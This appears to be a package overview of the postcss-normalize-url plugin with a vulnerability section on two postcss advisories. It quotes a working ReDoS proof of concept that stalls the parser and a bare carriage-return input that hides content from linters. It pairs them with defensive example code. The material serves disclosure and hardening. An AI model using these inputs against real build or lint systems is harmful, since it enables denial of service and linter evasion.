postcss-normalize-url is a PostCSS plugin that normalizes URLs within your CSS, ensuring consistency and preventing issues caused by variations in URL formatting. Versions 2.0.1 and 2.0.2 offer the same core functionality and declare the same runtime dependencies: postcss for CSS parsing, css-list for handling CSS value lists, normalize-url for the URL normalization logic itself, object-assign for copying object properties, and is-absolute-url for detecting absolute URLs. Both versions are aimed at developers who want to automate and standardize URL handling in their CSS workflow.
The only visible difference between versions 2.0.1 and 2.0.2 is the release date: the package.json files are otherwise nearly identical, so 2.0.2 is a patch release with no new features, no dependency changes, and presumably only bug fixes or minor improvements. Upgrading to 2.0.2 is recommended to pick up any resolved edge cases. The devDependencies cover testing (tape, tap-spec) and code linting (jshint, jshint-stylish); these are development-time tools only and do not ship to consumers. What matters for consumers is the runtime dependency on postcss, because the package inherits whatever version range of postcss it resolves to, and the known issues listed below are all in postcss rather than in postcss-normalize-url itself. Consistent URL normalization mainly improves maintainability and avoids errors from the same asset being referenced in inconsistent ways.
Known vulnerabilities affecting version 2.0.2 of the package (all via its postcss dependency)
Regular Expression Denial of Service in postcss
The package postcss before 7.0.36, and from 8.0.0 up to but not including 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js, the code that looks for a /*# sourceMappingURL=... */ comment when loading a previous source map. The vulnerable regexes share the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The unbounded (.*) capture runs to the end of the line and is then backtracked character by character to satisfy what follows it. Input that contains many sourceMappingURL= markers and no closing */ therefore makes the matcher rescan the remainder of the input for every marker, so parse time grows quadratically with the input length. Any build or lint step that parses untrusted CSS with an affected postcss can be stalled this way. The proof of concept below (from the advisory) measures parse time for progressively larger inputs:
var postcss = require("postcss")

// Builds a stylesheet with n unterminated source-map annotations:
// each "/*# sourceMappingURL=" restarts the regex scan, and the
// missing "*/" forces the matcher to backtrack across the rest of the input.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively larger attack strings and report how long each takes;
// on a vulnerable postcss the cost grows quadratically with the length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
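The proof of concept above needs a vulnerable postcss installed. The following added example (not code from the postcss project or the advisory) reproduces the mechanism stand-alone with a regex of the same shape as the quoted sub-pattern, next to a bounded form that cannot run past the next asterisk. The two regexes, the extractor and the timing helper are assumptions made for this illustration, not postcss's exact code.

```javascript
// Added example: the ReDoS mechanism behind the advisory, reproduced without
// postcss. ANNOTATION_UNBOUNDED mirrors the shape of the quoted sub-pattern;
// ANNOTATION_BOUNDED is a hardened variant. Both are assumptions for this
// illustration, not the regexes shipped in postcss.

// Unbounded capture: (.*) runs to the end of the line, then backtracks one
// character at a time looking for the trailing "*/". Every occurrence of
// "/*# sourceMappingURL=" restarts that scan, so the cost grows with
// (number of occurrences) x (remaining input length).
const ANNOTATION_UNBOUNDED = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

// Bounded capture: [^*]* stops at the next "*", so each attempt does work
// proportional to the distance to the next asterisk and the total stays linear.
const ANNOTATION_BOUNDED = /\/\*\s*# sourceMappingURL=([^*]*)\*\//;

// Returns the annotation URL found by the given regex, or null.
function extractAnnotation(css, re) {
  const m = css.match(re);
  return m ? m[1].trim() : null;
}

// Same attack input as the proof of concept: n openers and no closing "*/".
function buildAttack(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

// Runs the extractor and reports the result with the elapsed time in ms.
function timeExtract(css, re) {
  const t0 = performance.now();
  const result = extractAnnotation(css, re);
  return { result, ms: performance.now() - t0 };
}

function demo() {
  const benign = 'a{}/*# sourceMappingURL=a.css.map */';   // constructed input
  console.log('benign:',
    extractAnnotation(benign, ANNOTATION_UNBOUNDED),
    extractAnnotation(benign, ANNOTATION_BOUNDED));
  // Doubling n roughly quadruples the unbounded time; the bounded time stays flat.
  for (const n of [500, 1000, 2000]) {
    const attack = buildAttack(n);
    const slow = timeExtract(attack, ANNOTATION_UNBOUNDED);
    const fast = timeExtract(attack, ANNOTATION_BOUNDED);
    console.log(`n=${n} len=${attack.length}: unbounded ${slow.ms.toFixed(1)} ms, bounded ${fast.ms.toFixed(1)} ms`);
  }
}

demo();
```

Both regexes return the same URL for a well-formed annotation and null for the attack input; the difference is only in how much work the engine does before giving up. Replacing an unbounded `(.*)` with a character class that excludes the delimiter is the standard way to remove this class of backtracking, and it is the kind of change that fixed versions of such parsers apply.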
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS): a bare carriage return (\r) is tokenized differently from a line feed, as demonstrated by the rule @font-face{ font:(\r/*);}.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can craft CSS so that part of it is parsed by PostCSS as a CSS comment, yet after processing that part appears in PostCSS's output inside CSS nodes (rules, declarations) despite originally sitting in a comment. A linter that relies on PostCSS to distinguish comments from active CSS can therefore be made to accept content it should have flagged. The fix is to upgrade postcss to 8.4.31 or later.
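The trigger quoted above depends on a bare carriage return, that is a \r not followed by \n. The following added example (not PostCSS's fix, which lives in its tokenizer) is a defence-in-depth gate a linter can place in front of PostCSS when the CSS comes from an untrusted source: either report bare \r bytes, or canonicalise line endings before parsing. The assumption here is that \n, unlike bare \r, is tokenized the same way by all PostCSS versions; the helper names and the sample other than the advisory's rule are constructed for this example.

```javascript
// Added example: pre-parse checks for untrusted CSS, not PostCSS's own code.
// The sample rule is the one quoted in the advisory; everything else is
// constructed here.

// A carriage return that is not part of a \r\n pair.
const BARE_CR = /\r(?!\n)/g;

// Returns the byte offsets of bare carriage returns so a linter can report
// them as findings instead of silently passing the input on.
function findBareCarriageReturns(css) {
  const hits = [];
  let m;
  while ((m = BARE_CR.exec(css)) !== null) hits.push(m.index);
  return hits;
}

// Canonicalise \r\n and bare \r to \n before parsing (assumption: \n is
// handled consistently by every PostCSS version, so the \r discrepancy
// cannot be exploited once it is gone).
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Strict policy: refuse to lint input that contains a bare \r at all.
function assertNoBareCarriageReturn(css) {
  const hits = findBareCarriageReturns(css);
  if (hits.length > 0) {
    throw new Error(`untrusted CSS contains bare \\r at offset(s) ${hits.join(', ')}`);
  }
  return css;
}

function demo() {
  const sample = '@font-face{ font:(\r/*);}';   // rule quoted in the advisory
  console.log('bare CR offsets:', findBareCarriageReturns(sample));
  console.log('normalised:', JSON.stringify(normalizeLineEndings(sample)));
  try {
    assertNoBareCarriageReturn(sample);
  } catch (e) {
    console.log('rejected:', e.message);
  }
}

demo();
```

Rejecting is the better policy for a linter, since normalising would hide the fact that someone submitted CSS built to confuse the parser; normalising is the pragmatic choice for a build step that only needs a stable result. Neither replaces upgrading postcss to 8.4.31 or later.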